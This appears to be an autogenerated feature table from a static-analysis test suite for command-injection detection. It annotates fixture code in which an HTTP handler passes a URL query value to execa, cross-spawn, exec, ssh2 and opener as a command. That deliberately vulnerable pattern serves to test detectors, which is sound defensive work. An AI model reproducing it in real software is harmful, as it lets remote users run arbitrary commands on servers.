cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:43 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:43 | url.parse | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | exceptional return of url.par ... , true) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | url.par ... , true) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:64 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:64 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:64 | url.par ... ).query | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:64 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:64 | url.par ... ).query | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:69 | url.par ... ry.user | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:69 | url.par ... ry.user | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:69 | url.par ... ry.user | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:69 | url.par ... ry.user | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:69 | url.par ... ry.user | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:69 | url.par ... ry.user | stringConcatenatedWith | 'http://github.com/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:39:33:43 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:39:33:43 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:39:33:43 | parse | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:39:33:43 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:39:33:43 | parse | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:47 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:47 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:47 | req | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:47 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:47 | req | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:45:33:51 | req.url | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:49:33:51 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:49:33:51 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:49:33:51 | url | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:49:33:51 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:49:33:51 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:54:33:57 | true | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:60:33:64 | query | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:60:33:64 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:60:33:64 | query | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:60:33:64 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:60:33:64 | query | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:66:33:69 | user | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:66:33:69 | user | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:66:33:69 | user | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:66:33:69 | user | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:66:33:69 | user | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:10 | opener | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:10 | opener | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:10 | opener | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:10 | opener | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:10 | opener | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | exceptional return of opener( ... cmd }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | exceptional return of opener( ... cmd }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | exceptional return of opener( ... cmd }) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | exceptional return of opener( ... cmd }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | exceptional return of opener( ... cmd }) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | opener( ... cmd }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | opener( ... cmd }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | opener( ... cmd }) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | opener( ... cmd }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | opener( ... cmd }) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | CalleeFlexibleAccessPath | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | calleeImports | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:12:34:30 | "http://github.com" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | CalleeFlexibleAccessPath | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | calleeImports | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:41 | command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:41 | command | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:41 | command | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:41 | command | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:41 | command | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:35:34:46 | command: cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | CalleeFlexibleAccessPath | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | InputAccessPathFromCallee | 1.command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | assignedToPropName | command | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | calleeImports | opener | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:0 | this | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:1 | cp | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:1:1:1 | require | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:9 | https | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:9 | https | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:9 | https | fileImports | child_process https | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:5:1:28 | https | contextFunctionInterfaces | | +| 